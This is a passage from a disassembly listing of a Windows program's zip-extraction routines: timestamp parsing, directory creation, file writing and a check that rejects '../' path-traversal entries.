mov ecx, [ebp+arg_4]
mov dword ptr [ecx+108h], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx+10Ch], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax+110h], 0
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+114h], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx+118h], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax+11Ch], 0
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+120h], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx+124h], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax+128h], 0
xor eax, eax
jmp loc_4105D1
; ---------------------------------------------------------------------------
loc_41007B: ; CODE XREF: sub_40FF4C+96�j
mov ecx, [ebp+var_1E8]
mov edx, [ecx]
mov eax, [ebp+arg_0]
cmp eax, [edx+10h]
jge short loc_41009C
mov ecx, [ebp+var_1E8]
mov edx, [ecx]
push edx
call sub_40F1E3
add esp, 4
loc_41009C: ; CODE XREF: sub_40FF4C+13D�j
; sub_40FF4C+171�j
mov eax, [ebp+var_1E8]
mov ecx, [eax]
mov edx, [ecx+10h]
cmp edx, [ebp+arg_0]
jge short loc_4100BF
mov eax, [ebp+var_1E8]
mov ecx, [eax]
push ecx
call sub_40F251
add esp, 4
jmp short loc_41009C
; ---------------------------------------------------------------------------
loc_4100BF: ; CODE XREF: sub_40FF4C+15E�j
push 0
push 0
push 0
push 0
push 104h
lea edx, [ebp+var_190]
push edx
lea eax, [ebp+var_58]
push eax
mov ecx, [ebp+var_1E8]
mov edx, [ecx]
push edx
call sub_40F1B4
add esp, 20h
lea eax, [ebp+var_64]
push eax
lea ecx, [ebp+var_78]
push ecx
lea edx, [ebp+var_8C]
push edx
mov eax, [ebp+var_1E8]
mov ecx, [eax]
push ecx
call sub_40F42B
add esp, 10h
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_41011B
mov eax, 700h
jmp loc_4105D1
; ---------------------------------------------------------------------------
loc_41011B: ; CODE XREF: sub_40FF4C+1C3�j
push 0
mov edx, [ebp+var_78]
push edx
mov eax, [ebp+var_1E8]
mov ecx, [eax]
mov edx, [ecx]
push edx
call sub_40E53B
add esp, 0Ch
test eax, eax
jz short loc_410142
mov eax, 800h
jmp loc_4105D1
; ---------------------------------------------------------------------------
loc_410142: ; CODE XREF: sub_40FF4C+1EA�j
mov eax, [ebp+var_64]
push eax
call sub_4114F4
add esp, 4
mov [ebp+var_1C4], eax
mov ecx, [ebp+var_1C4]
mov [ebp+var_70], ecx
mov edx, [ebp+var_1E8]
mov eax, [edx]
mov ecx, [eax]
push ecx
mov edx, [ebp+var_64]
push edx
push 1
mov eax, [ebp+var_70]
push eax
call sub_40E610
add esp, 10h
cmp eax, [ebp+var_64]
jz short loc_4101A1
mov ecx, [ebp+var_70]
mov [ebp+var_1C8], ecx
mov edx, [ebp+var_1C8]
push edx
call sub_4114EE
add esp, 4
mov eax, 800h
jmp loc_4105D1
; ---------------------------------------------------------------------------
loc_4101A1: ; CODE XREF: sub_40FF4C+231�j
mov eax, [ebp+var_1E8]
mov ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [ecx+10h]
mov [edx], eax
lea ecx, [ebp+var_190]
push ecx
mov edx, [ebp+arg_4]
add edx, 4
push edx
call sub_411628 ; strcpy
add esp, 8
mov eax, [ebp+var_24]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 40000000h
neg ecx
sbb ecx, ecx
neg ecx
mov byte ptr [ebp+var_88], cl
mov edx, [ebp+var_8]
and edx, 800000h
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_19C], dl
mov eax, [ebp+var_8]
and eax, 1
neg eax
sbb eax, eax
neg eax
mov byte ptr [ebp+var_198], al
mov ecx, [ebp+var_8]
and ecx, 2
neg ecx
sbb ecx, ecx
neg ecx
mov byte ptr [ebp+var_6C], cl
mov edx, [ebp+var_8]
and edx, 4
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_84], dl
mov eax, [ebp+var_8]
and eax, 10h
neg eax
sbb eax, eax
neg eax
mov byte ptr [ebp+var_194], al
mov ecx, [ebp+var_8]
and ecx, 20h
neg ecx
sbb ecx, ecx
neg ecx
mov byte ptr [ebp+var_4], cl
mov edx, [ebp+arg_4]
mov dword ptr [edx+108h], 80h
mov eax, [ebp+var_88]
and eax, 0FFh
test eax, eax
jnz short loc_410277
mov ecx, [ebp+var_194]
and ecx, 0FFh
test ecx, ecx
jz short loc_41028B
loc_410277: ; CODE XREF: sub_40FF4C+319�j
mov edx, [ebp+arg_4]
mov eax, [edx+108h]
or al, 10h
mov ecx, [ebp+arg_4]
mov [ecx+108h], eax
loc_41028B: ; CODE XREF: sub_40FF4C+329�j
mov edx, [ebp+var_4]
and edx, 0FFh
test edx, edx
jz short loc_4102AD
mov eax, [ebp+arg_4]
mov ecx, [eax+108h]
or ecx, 20h
mov edx, [ebp+arg_4]
mov [edx+108h], ecx
loc_4102AD: ; CODE XREF: sub_40FF4C+34A�j
mov eax, [ebp+var_6C]
and eax, 0FFh
test eax, eax
jz short loc_4102CE
mov ecx, [ebp+arg_4]
mov edx, [ecx+108h]
or edx, 2
mov eax, [ebp+arg_4]
mov [eax+108h], edx
loc_4102CE: ; CODE XREF: sub_40FF4C+36B�j
mov ecx, [ebp+var_19C]
and ecx, 0FFh
test ecx, ecx
jz short loc_4102EE
mov edx, [ebp+var_198]
and edx, 0FFh
test edx, edx
jz short loc_410303
loc_4102EE: ; CODE XREF: sub_40FF4C+390�j
mov eax, [ebp+arg_4]
mov ecx, [eax+108h]
or ecx, 1
mov edx, [ebp+arg_4]
mov [edx+108h], ecx
loc_410303: ; CODE XREF: sub_40FF4C+3A0�j
mov eax, [ebp+var_84]
and eax, 0FFh
test eax, eax
jz short loc_410327
mov ecx, [ebp+arg_4]
mov edx, [ecx+108h]
or edx, 4
mov eax, [ebp+arg_4]
mov [eax+108h], edx
loc_410327: ; CODE XREF: sub_40FF4C+3C4�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_40]
mov [ecx+124h], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_3C]
mov [eax+128h], ecx
mov edx, [ebp+var_48]
and edx, 0FFFFh
mov [ebp+var_80], dx
mov eax, [ebp+var_48]
shr eax, 10h
and eax, 0FFFFh
mov [ebp+var_68], ax
lea ecx, [ebp+var_60]
push ecx
mov dx, [ebp+var_80]
push edx
mov ax, [ebp+var_68]
push eax
call dword_413090 ; DosDateTimeToFileTime
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_60]
mov [ecx+10Ch], edx
mov eax, [ebp+var_5C]
mov [ecx+110h], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_60]
mov [ecx+114h], edx
mov eax, [ebp+var_5C]
mov [ecx+118h], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_60]
mov [ecx+11Ch], edx
mov eax, [ebp+var_5C]
mov [ecx+120h], eax
mov [ebp+var_7C], 0
loc_4103B5: ; CODE XREF: sub_40FF4C+4D4�j
mov ecx, [ebp+var_7C]
add ecx, 4
cmp ecx, [ebp+var_64]
jnb loc_410587
mov edx, [ebp+var_70]
add edx, [ebp+var_7C]
mov al, [edx]
mov [ebp+var_1B4], al
mov ecx, [ebp+var_70]
add ecx, [ebp+var_7C]
mov dl, [ecx+1]
mov [ebp+var_1B3], dl
mov [ebp+var_1B2], 0
mov eax, [ebp+var_70]
add eax, [ebp+var_7C]
movsx ecx, byte ptr [eax+2]
mov [ebp+var_1A4], ecx
push offset aUt ; "UT"
lea edx, [ebp+var_1B4]
push edx
call sub_411684 ; strcmp
add esp, 8
test eax, eax
jz short loc_410422
mov eax, [ebp+var_1A4]
mov ecx, [ebp+var_7C]
lea edx, [ecx+eax+4]
mov [ebp+var_7C], edx
jmp short loc_4103B5
; ---------------------------------------------------------------------------
loc_410422: ; CODE XREF: sub_40FF4C+4C2�j
mov eax, [ebp+var_70]
add eax, [ebp+var_7C]
movsx ecx, byte ptr [eax+4]
mov [ebp+var_1A0], ecx
mov edx, [ebp+var_1A0]
and edx, 1
neg edx
sbb edx, edx
neg edx
mov byte ptr [ebp+var_1A8], dl
mov eax, [ebp+var_1A0]
and eax, 2
neg eax
sbb eax, eax
neg eax
mov byte ptr [ebp+var_1B0], al
mov ecx, [ebp+var_1A0]
and ecx, 4
neg ecx
sbb ecx, ecx
neg ecx
mov byte ptr [ebp+var_1AC], cl
mov edx, [ebp+var_7C]
add edx, 5
mov [ebp+var_7C], edx
mov eax, [ebp+var_1A8]
and eax, 0FFh
test eax, eax
jz short loc_4104D6
mov ecx, [ebp+var_70]
add ecx, [ebp+var_7C]
mov edx, [ecx]
mov [ebp+var_1B8], edx
mov eax, [ebp+var_7C]
add eax, 4
mov [ebp+var_7C], eax
mov ecx, [ebp+var_1B8]
push ecx
call sub_40FE22
add esp, 4
mov [ebp+var_1D0], eax
mov [ebp+var_1CC], edx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1D0]
mov [edx+11Ch], eax
mov ecx, [ebp+var_1CC]
mov [edx+120h], ecx
loc_4104D6: ; CODE XREF: sub_40FF4C+53B�j
mov edx, [ebp+var_1B0]
and edx, 0FFh
test edx, edx
jz short loc_410533
mov eax, [ebp+var_70]
add eax, [ebp+var_7C]
mov ecx, [eax]
mov [ebp+var_1BC], ecx
mov edx, [ebp+var_7C]
add edx, 4
mov [ebp+var_7C], edx
mov eax, [ebp+var_1BC]
push eax
call sub_40FE22
add esp, 4
mov [ebp+var_1D8], eax
mov [ebp+var_1D4], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1D8]
mov [ecx+10Ch], edx
mov eax, [ebp+var_1D4]
mov [ecx+110h], eax
loc_410533: ; CODE XREF: sub_40FF4C+598�j
mov ecx, [ebp+var_1AC]
and ecx, 0FFh
test ecx, ecx
jz short loc_410587
mov edx, [ebp+var_70]
add edx, [ebp+var_7C]
mov eax, [edx]
mov [ebp+var_1C0], eax
mov ecx, [ebp+var_1C0]
push ecx
call sub_40FE22
add esp, 4
mov [ebp+var_1E0], eax
mov [ebp+var_1DC], edx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1E0]
mov [edx+114h], eax
mov ecx, [ebp+var_1DC]
mov [edx+118h], ecx
loc_410587: ; CODE XREF: sub_40FF4C+472�j
; sub_40FF4C+5F5�j
cmp [ebp+var_70], 0
jz short loc_4105A5
mov edx, [ebp+var_70]
mov [ebp+var_1E4], edx
mov eax, [ebp+var_1E4]
push eax
call sub_4114EE
add esp, 4
loc_4105A5: ; CODE XREF: sub_40FF4C+63F�j
push 12Ch
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+var_1E8]
add edx, 8
push edx
call sub_411634 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1E8]
mov ecx, [ebp+arg_0]
mov [eax+134h], ecx
xor eax, eax
loc_4105D1: ; CODE XREF: sub_40FF4C+2A�j
; sub_40FF4C+8D�j ...
mov esp, ebp
pop ebp
retn 8
sub_40FF4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105D7 proc near ; CODE XREF: HSho:0041126C�p
; HSho:004112EC�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov eax, [ebp+arg_4]
and eax, 0FFh
neg eax
sbb eax, eax
neg eax
add eax, 1
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_10]
mov eax, [edx]
push eax
call sub_40F30A
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_410645
cmp [ebp+arg_8], 0
jz short loc_41061C
mov ecx, [ebp+arg_8]
mov dword ptr [ecx], 0FFFFFFFFh
loc_41061C: ; CODE XREF: sub_4105D7+3A�j
cmp [ebp+arg_C], 0
jz short loc_41063E
push 12Ch
push 0
mov edx, [ebp+arg_C]
push edx
call sub_411622 ; memset
add esp, 0Ch
mov eax, [ebp+arg_C]
mov dword ptr [eax], 0FFFFFFFFh
loc_41063E: ; CODE XREF: sub_4105D7+49�j
mov eax, 500h
jmp short loc_4106A5
; ---------------------------------------------------------------------------
loc_410645: ; CODE XREF: sub_4105D7+34�j
mov ecx, [ebp+var_10]
cmp dword ptr [ecx+4], 0FFFFFFFFh
jz short loc_41065C
mov edx, [ebp+var_10]
mov eax, [edx]
push eax
call sub_40FCA7
add esp, 4
loc_41065C: ; CODE XREF: sub_4105D7+75�j
mov ecx, [ebp+var_10]
mov dword ptr [ecx+4], 0FFFFFFFFh
mov edx, [ebp+var_10]
mov eax, [edx]
mov ecx, [eax+10h]
mov [ebp+var_8], ecx
cmp [ebp+arg_8], 0
jz short loc_41067F
mov edx, [ebp+arg_8]
mov eax, [ebp+var_8]
mov [edx], eax
loc_41067F: ; CODE XREF: sub_4105D7+9E�j
cmp [ebp+arg_C], 0
jz short loc_4106A3
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+var_8]
push edx
mov ecx, [ebp+var_10]
call sub_40FF4C
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4106A3
mov eax, [ebp+var_C]
jmp short loc_4106A5
; ---------------------------------------------------------------------------
loc_4106A3: ; CODE XREF: sub_4105D7+AC�j
; sub_4105D7+C5�j
xor eax, eax
loc_4106A5: ; CODE XREF: sub_4105D7+6C�j
; sub_4105D7+CA�j
mov esp, ebp
pop ebp
retn 10h
sub_4105D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4106AB proc near ; CODE XREF: sub_4106AB+B4�p
; sub_4107B2+227�p ...
var_214 = byte ptr -214h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 214h
cmp [ebp+arg_4], 0
jz short loc_4106C4
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_4106C9
loc_4106C4: ; CODE XREF: sub_4106AB+D�j
jmp loc_4107AE
; ---------------------------------------------------------------------------
loc_4106C9: ; CODE XREF: sub_4106AB+17�j
mov edx, [ebp+arg_4]
mov [ebp+var_10C], edx
mov eax, [ebp+var_10C]
mov [ebp+var_4], eax
loc_4106DB: ; CODE XREF: sub_4106AB+62�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_41070F
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 2Fh
jz short loc_4106FB
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 5Ch
jnz short loc_410704
loc_4106FB: ; CODE XREF: sub_4106AB+43�j
mov ecx, [ebp+var_4]
mov [ebp+var_10C], ecx
loc_410704: ; CODE XREF: sub_4106AB+4E�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_4106DB
; ---------------------------------------------------------------------------
loc_41070F: ; CODE XREF: sub_4106AB+38�j
mov eax, [ebp+var_10C]
mov [ebp+var_110], eax
mov ecx, [ebp+var_10C]
cmp ecx, [ebp+arg_4]
jz short loc_410776
mov edx, [ebp+var_10C]
sub edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_214]
push ecx
call sub_402680
add esp, 0Ch
mov edx, [ebp+var_10C]
sub edx, [ebp+arg_4]
mov [ebp+edx+var_214], 0
lea eax, [ebp+var_214]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4106AB
add esp, 8
mov edx, [ebp+var_110]
add edx, 1
mov [ebp+var_110], edx
loc_410776: ; CODE XREF: sub_4106AB+79�j
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_108]
push ecx
call sub_411628 ; strcpy
add esp, 8
mov edx, [ebp+var_110]
push edx
lea eax, [ebp+var_108]
push eax
call sub_411640 ; strcat
add esp, 8
push 0
lea ecx, [ebp+var_108]
push ecx
call dword_413030 ; CreateDirectoryA
loc_4107AE: ; CODE XREF: sub_4106AB:loc_4106C4�j
mov esp, ebp
pop ebp
retn
sub_4106AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4107B2 proc near ; CODE XREF: sub_411390+58�p
var_4264 = dword ptr -4264h
var_4260 = dword ptr -4260h
var_425C = dword ptr -425Ch
var_4258 = byte ptr -4258h
var_4251 = byte ptr -4251h
var_4250 = byte ptr -4250h
var_424F = byte ptr -424Fh
var_414C = dword ptr -414Ch
var_4148 = dword ptr -4148h
var_4144 = dword ptr -4144h
var_4140 = dword ptr -4140h
var_413C = dword ptr -413Ch
var_4138 = dword ptr -4138h
var_4134 = dword ptr -4134h
var_4130 = dword ptr -4130h
var_412C = byte ptr -412Ch
var_4128 = byte ptr -4128h
var_4024 = dword ptr -4024h
var_4020 = byte ptr -4020h
var_4018 = byte ptr -4018h
var_4010 = byte ptr -4010h
var_4000 = byte ptr -4000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 4264h
call sub_4115D0
push ebx
push esi
mov [ebp+var_4260], ecx
cmp [ebp+arg_C], 3
jz short loc_4107E3
cmp [ebp+arg_C], 2
jz short loc_4107E3
cmp [ebp+arg_C], 1
jz short loc_4107E3
mov eax, 10000h
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_4107E3: ; CODE XREF: sub_4107B2+19�j
; sub_4107B2+1F�j ...
cmp [ebp+arg_C], 3
jnz loc_41090E
mov eax, [ebp+var_4260]
mov ecx, [ebp+arg_0]
cmp ecx, [eax+4]
jz loc_4108A4
mov edx, [ebp+var_4260]
cmp dword ptr [edx+4], 0FFFFFFFFh
jz short loc_41081C
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_40FCA7
add esp, 4
loc_41081C: ; CODE XREF: sub_4107B2+57�j
mov edx, [ebp+var_4260]
mov dword ptr [edx+4], 0FFFFFFFFh
mov eax, [ebp+var_4260]
mov ecx, [eax]
mov edx, [ebp+arg_0]
cmp edx, [ecx+4]
jl short loc_410843
mov eax, 10000h
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_410843: ; CODE XREF: sub_4107B2+85�j
mov eax, [ebp+var_4260]
mov ecx, [eax]
mov edx, [ebp+arg_0]
cmp edx, [ecx+10h]
jge short loc_410864
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_40F1E3
add esp, 4
loc_410864: ; CODE XREF: sub_4107B2+9F�j
; sub_4107B2+D3�j
mov edx, [ebp+var_4260]
mov eax, [edx]
mov ecx, [eax+10h]
cmp ecx, [ebp+arg_0]
jge short loc_410887
mov edx, [ebp+var_4260]
mov eax, [edx]
push eax
call sub_40F251
add esp, 4
jmp short loc_410864
; ---------------------------------------------------------------------------
loc_410887: ; CODE XREF: sub_4107B2+C0�j
mov ecx, [ebp+var_4260]
mov edx, [ecx]
push edx
call sub_40F6B0
add esp, 4
mov eax, [ebp+var_4260]
mov ecx, [ebp+arg_0]
mov [eax+4], ecx
loc_4108A4: ; CODE XREF: sub_4107B2+47�j
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_4260]
mov edx, [ecx]
push edx
call sub_40F872
add esp, 0Ch
mov [ebp+var_4140], eax
cmp [ebp+var_4140], 0
jle short loc_4108D6
mov eax, 600h
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_4108D6: ; CODE XREF: sub_4107B2+118�j
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_40FCA7
add esp, 4
mov edx, [ebp+var_4260]
mov dword ptr [edx+4], 0FFFFFFFFh
cmp [ebp+var_4140], 0
jnz short loc_410904
xor eax, eax
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_410904: ; CODE XREF: sub_4107B2+149�j
mov eax, 5000000h
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_41090E: ; CODE XREF: sub_4107B2+35�j
mov eax, [ebp+var_4260]
cmp dword ptr [eax+4], 0FFFFFFFFh
jz short loc_41092B
mov ecx, [ebp+var_4260]
mov edx, [ecx]
push edx
call sub_40FCA7
add esp, 4
loc_41092B: ; CODE XREF: sub_4107B2+166�j
mov eax, [ebp+var_4260]
mov dword ptr [eax+4], 0FFFFFFFFh
mov ecx, [ebp+var_4260]
mov edx, [ecx]
mov eax, [ebp+arg_0]
cmp eax, [edx+4]
jl short loc_410952
mov eax, 10000h
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_410952: ; CODE XREF: sub_4107B2+194�j
mov ecx, [ebp+var_4260]
mov edx, [ecx]
mov eax, [ebp+arg_0]
cmp eax, [edx+10h]
jge short loc_410973
mov ecx, [ebp+var_4260]
mov edx, [ecx]
push edx
call sub_40F1E3
add esp, 4
loc_410973: ; CODE XREF: sub_4107B2+1AE�j
; sub_4107B2+1E2�j
mov eax, [ebp+var_4260]
mov ecx, [eax]
mov edx, [ecx+10h]
cmp edx, [ebp+arg_0]
jge short loc_410996
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_40F251
add esp, 4
jmp short loc_410973
; ---------------------------------------------------------------------------
loc_410996: ; CODE XREF: sub_4107B2+1CF�j
lea edx, [ebp+var_412C]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4260]
call sub_40FF4C
mov ecx, [ebp+var_4024]
and ecx, 10h
test ecx, ecx
jz short loc_4109E8
cmp [ebp+arg_C], 1
jnz short loc_4109C6
xor eax, eax
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_4109C6: ; CODE XREF: sub_4107B2+20B�j
lea edx, [ebp+var_4128]
push edx
mov eax, [ebp+var_4260]
add eax, 138h
push eax
call sub_4106AB
add esp, 8
xor eax, eax
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_4109E8: ; CODE XREF: sub_4107B2+205�j
cmp [ebp+arg_C], 1
jnz short loc_4109FC
mov ecx, [ebp+arg_4]
mov [ebp+var_4134], ecx
jmp loc_410B6E
; ---------------------------------------------------------------------------
loc_4109FC: ; CODE XREF: sub_4107B2+23A�j
mov edx, [ebp+arg_4]
mov [ebp+var_4148], edx
mov eax, [ebp+var_4148]
mov [ebp+var_4144], eax
loc_410A11: ; CODE XREF: sub_4107B2+2A6�j
mov ecx, [ebp+var_4144]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_410A5A
mov eax, [ebp+var_4144]
movsx ecx, byte ptr [eax]
cmp ecx, 2Fh
jz short loc_410A3A
mov edx, [ebp+var_4144]
movsx eax, byte ptr [edx]
cmp eax, 5Ch
jnz short loc_410A49
loc_410A3A: ; CODE XREF: sub_4107B2+278�j
mov ecx, [ebp+var_4144]
add ecx, 1
mov [ebp+var_4148], ecx
loc_410A49: ; CODE XREF: sub_4107B2+286�j
mov edx, [ebp+var_4144]
add edx, 1
mov [ebp+var_4144], edx
jmp short loc_410A11
; ---------------------------------------------------------------------------
loc_410A5A: ; CODE XREF: sub_4107B2+26A�j
mov eax, [ebp+var_4148]
cmp eax, [ebp+arg_4]
jz loc_410B4A
mov ecx, [ebp+arg_4]
push ecx
lea edx, [ebp+var_4250]
push edx
call sub_411628 ; strcpy
add esp, 8
mov eax, [ebp+var_4148]
sub eax, [ebp+arg_4]
mov [ebp+eax+var_4251], 0
movsx ecx, [ebp+var_4250]
cmp ecx, 2Fh
jz short loc_410ABD
movsx edx, [ebp+var_4250]
cmp edx, 5Ch
jz short loc_410ABD
movsx eax, [ebp+var_424F]
cmp eax, 3Ah
jz short loc_410ABD
mov [ebp+var_4264], 0
jmp short loc_410AC7
; ---------------------------------------------------------------------------
loc_410ABD: ; CODE XREF: sub_4107B2+2E5�j
; sub_4107B2+2F1�j ...
mov [ebp+var_4264], 1
loc_410AC7: ; CODE XREF: sub_4107B2+309�j
mov cl, byte ptr [ebp+var_4264]
mov byte ptr [ebp+var_414C], cl
mov ebx, [ebp+var_414C]
and ebx, 0FFh
push offset a__ ; "../"
lea edx, [ebp+var_4250]
push edx
call sub_4114A0
add esp, 8
mov esi, eax
neg esi
sbb esi, esi
neg esi
push offset a___0 ; "..\\"
lea eax, [ebp+var_4250]
push eax
call sub_4114A0
add esp, 8
neg eax
sbb eax, eax
neg eax
or esi, eax
or ebx, esi
mov byte ptr [ebp+var_414C], bl
mov ecx, [ebp+var_414C]
and ecx, 0FFh
test ecx, ecx
jnz short loc_410B4A
lea edx, [ebp+var_4250]
push edx
mov eax, [ebp+var_4260]
add eax, 138h
push eax
call sub_4106AB
add esp, 8
loc_410B4A: ; CODE XREF: sub_4107B2+2B1�j
; sub_4107B2+37B�j
push 0
mov ecx, [ebp+var_4024]
push ecx
push 2
push 0
push 0
push 40000000h
mov edx, [ebp+arg_4]
push edx
call dword_413018 ; CreateFileA
mov [ebp+var_4134], eax
loc_410B6E: ; CODE XREF: sub_4107B2+245�j
cmp [ebp+var_4134], 0FFFFFFFFh
jnz short loc_410B81
mov eax, 200h
jmp loc_410CC0
; ---------------------------------------------------------------------------
loc_410B81: ; CODE XREF: sub_4107B2+3C3�j
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_40F6B0
add esp, 4
mov byte ptr [ebp+var_4138], 0
loc_410B99: ; CODE XREF: sub_4107B2:loc_410C15�j
push 4000h
lea edx, [ebp+var_4000]
push edx
mov eax, [ebp+var_4260]
mov ecx, [eax]
push ecx
call sub_40F872
add esp, 0Ch
mov [ebp-4254h], eax
cmp dword ptr [ebp-4254h], 0
jge short loc_410BCE
mov byte ptr [ebp+var_4138], 1
jmp short loc_410C17
; ---------------------------------------------------------------------------
loc_410BCE: ; CODE XREF: sub_4107B2+411�j
cmp dword ptr [ebp-4254h], 0
jnz short loc_410BD9
jmp short loc_410C17
; ---------------------------------------------------------------------------
loc_410BD9: ; CODE XREF: sub_4107B2+423�j
push 0
lea edx, [ebp+var_4258]
push edx
mov eax, [ebp-4254h]
push eax
lea ecx, [ebp+var_4000]
push ecx
mov edx, [ebp+var_4134]
push edx
call dword_413050 ; WriteFile
mov [ebp+var_425C], eax
cmp [ebp+var_425C], 0
jnz short loc_410C15
mov byte ptr [ebp+var_4138], 1
jmp short loc_410C17
; ---------------------------------------------------------------------------
loc_410C15: ; CODE XREF: sub_4107B2+458�j
jmp short loc_410B99
; ---------------------------------------------------------------------------
loc_410C17: ; CODE XREF: sub_4107B2+41A�j
; sub_4107B2+425�j ...
mov byte ptr [ebp+var_413C], 0
mov eax, [ebp+var_4134]
push eax
call dword_4130A0 ; GetFileType
mov [ebp+var_4130], eax
cmp [ebp+var_4130], 1
jnz short loc_410C51
mov ecx, [ebp+var_4138]
and ecx, 0FFh
test ecx, ecx
jnz short loc_410C51
mov byte ptr [ebp+var_413C], 1
loc_410C51: ; CODE XREF: sub_4107B2+486�j
; sub_4107B2+496�j
mov edx, [ebp+var_413C]
and edx, 0FFh
test edx, edx
jz short loc_410C83
lea eax, [ebp+var_4010]
push eax
lea ecx, [ebp+var_4020]
push ecx
lea edx, [ebp+var_4018]
push edx
mov eax, [ebp+var_4134]
push eax
call dword_41308C ; SetFileTime
loc_410C83: ; CODE XREF: sub_4107B2+4AD�j
cmp [ebp+arg_C], 1
jz short loc_410C96
mov ecx, [ebp+var_4134]
push ecx
call dword_413020 ; CloseHandle
loc_410C96: ; CODE XREF: sub_4107B2+4D5�j
mov edx, [ebp+var_4260]
mov eax, [edx]
push eax
call sub_40FCA7
add esp, 4
mov ecx, [ebp+var_4138]
and ecx, 0FFh
test ecx, ecx
jz short loc_410CBE
mov eax, 400h
jmp short loc_410CC0
; ---------------------------------------------------------------------------
loc_410CBE: ; CODE XREF: sub_4107B2+503�j
xor eax, eax
loc_410CC0: ; CODE XREF: sub_4107B2+2C�j
; sub_4107B2+8C�j ...
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_4107B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410CC8 proc near ; CODE XREF: sub_4113FB+48�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0FFFFFFFFh
jz short loc_410CE6
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
call sub_40FCA7
add esp, 4
loc_410CE6: ; CODE XREF: sub_410CC8+E�j
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0FFFFFFFFh
mov ecx, [ebp+var_4]
cmp dword ptr [ecx], 0
jz short loc_410D06
mov edx, [ebp+var_4]
mov eax, [edx]
push eax
call sub_40ECA8
add esp, 4
loc_410D06: ; CODE XREF: sub_410CC8+2E�j
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
xor eax, eax
mov esp, ebp
pop ebp
retn
sub_410CC8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
cmp dword ptr [ebp+8], 1
jnz short loc_410D29
mov eax, ds:dword_41BCD4
mov [ebp+8], eax
loc_410D29: ; CODE XREF: HSho:00410D1F�j
mov dword ptr [ebp-8], offset aUnknownZipResu ; "unknown zip result code"
mov ecx, [ebp+8]
mov [ebp-10h], ecx
cmp dword ptr [ebp-10h], 20000h
ja loc_410DFE
cmp dword ptr [ebp-10h], 20000h
jz loc_410F24
cmp dword ptr [ebp-10h], 500h
ja short loc_410DB7
cmp dword ptr [ebp-10h], 500h
